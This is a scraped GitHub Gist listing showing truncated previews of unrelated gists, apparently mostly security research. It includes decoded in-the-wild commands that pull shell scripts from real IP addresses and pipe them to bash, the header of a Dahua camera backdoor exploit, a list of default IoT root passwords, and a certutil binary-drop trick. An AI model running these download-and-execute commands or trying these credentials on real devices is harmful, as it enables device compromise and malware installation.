Andrew Morris andrew-morris
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| b64decoded | hits | |
|---|---|---|
| (curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash | 2056 | |
| (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash | 162 | |
| (curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash | 2 |
1stOctet
/ Elephant-IP-Addresses.txt
Last active
February 6, 2020 12:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| These are the top 50 IP addresses in the world according to commoncrawl.org | |
| ***12 million domains hosted on 50 IP addresses*** | |
| Domains IPAddress | |
| --------- ----------- | |
| 1,060,124 34.73.24.83 | |
| 107,734 23.227.38.65 | |
| 148,364 23.227.38.64 | |
| 226,076 23.227.38.64 | |
| 389,814 23.227.38.64 |
n0x08
/ shoGrey_ip.py
Last active
February 25, 2021 11:19
Lookup IP address against greynoise.io and shodan
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # !/usr/bin/env python | |
| # shoGrey_ip.py | |
| # | |
| # Stupid simple IP lookup against Greynoise.io | |
| # Also looks up against Shodan and returns ports, tags, vulns | |
| # requires json, requests, shodan | |
| # | |
| # Also requires Shodan API key | |
| # | |
| # Example: python3 shoGrey_ip.py 1.2.3.4 |
avelardi
/ dahua-backdoor.py
Created
March 6, 2017 16:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python2.7 | |
| # | |
| # Dahua backdoor Generation 2 and 3 | |
| # Author: bashis <mcw noemail eu> March 2017 | |
| # | |
| # Credentials: No credentials needed (Anonymous) | |
| #Jacked from git history | |
| # | |
| import string |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "github.com/auth0/go-jwt-middleware" | |
| "github.com/dgrijalva/jwt-go" | |
| "gopkg.in/gin-gonic/gin.v1" | |
| ) | |
| func main() { | |
| startServer() |
philipjkim
/ elastic_aggregator.go
Last active
June 16, 2021 18:02
Go Elasticsearch aggregation example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "time" | |
| "encoding/json" | |
| elastic "gopkg.in/olivere/elastic.v3" | |
| ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Summary of passwords by sperglord8008s, updated November 1. 2020. For login try "root", "default", "defaul" or "root" | |
| 00000000 | |
| 059AnkJ | |
| 4uvdzKqBkj.jg | |
| 7ujMko0admin | |
| 7ujMko0vizxv | |
| 123 | |
| 1111 | |
| 1234 |
mattifestation
/ drop_binary.bat
Created
July 12, 2015 05:49
Drop binary data from the command line w/o needing PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo -----BEGIN CERTIFICATE----- > encoded.txt | |
| echo Just Base64 encode your binary data | |
| echo TVoAAA== >> encoded.txt | |
| echo -----END CERTIFICATE----- >> encoded.txt | |
| certutil -decode encoded.txt decoded.bin |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "compress/gzip" | |
| "io" | |
| "io/ioutil" | |
| "bytes" | |
| "log" | |
| ) |
Wack0
/ gist:17c56b77a90073be81d3
Last active
July 23, 2021 12:54
It's not just superfish that's the problem.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Superfish uses an SDK from Komodia to do SSL MITM. That's probably known by now. | |
| Superfish isn't the only product to use that sdk. there's others too. | |
| Each product that uses the Komodia SDK to MITM, has its OWN CA cert and private | |
| key pair. Seems a lot of people think they all use the superfish cert. That is | |
| NOT the case. | |
| First thing I checked was komodia's own parental control software, | |
| Keep My Family Secure. (mentioned on komodia's own website). |
NewerOlder